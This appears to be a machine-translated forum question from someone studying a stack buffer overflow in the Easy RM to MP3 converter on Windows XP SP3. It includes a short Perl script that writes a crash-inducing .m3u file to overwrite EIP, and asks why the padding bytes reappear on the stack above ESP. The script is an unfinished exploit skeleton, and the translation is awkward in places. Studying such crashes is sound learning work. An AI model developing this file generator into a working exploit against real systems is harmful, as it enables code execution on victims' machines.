有時回來,對易RM上的漏洞到MP3播放器2.7.3.700在Windows XP SP3(http://www.exploit-db.com/exploits/9177/)工作時,我看到這我不理解一個概念來了,它是這樣的:的Shellcode發展,ESP指針
用於生成惡意文件perl腳本:生成所述惡意文件後
my $junk = "\x41" x 25000;
my $offset = "\x42" x 1072;
my $eip = "\x43" x 4;
my $file = "crash.m3u";
open ($file,">$file");
print $file $junk.$offset.$eip.$adjustment;
close ($file);
,餵它在轉換器和他們分析棧的內容在[ESP + 18](尋址相對於ESP)...爲什麼這些A在這裏?
我的意思是:
A的從[ESP-88E8]開始到[ESP-43C]
B的從開始[ESP-438]至[ESP-C]
C'S在[ESP-8]
那麼爲什麼這些A再次在[ESP + 18]到[ESP + 418]?爲什麼當他們已經從[ESP-88E8]到[ESP-43C]之間放置時,這些A在[ESP + 18]到[ESP + 418]重複。
謝謝。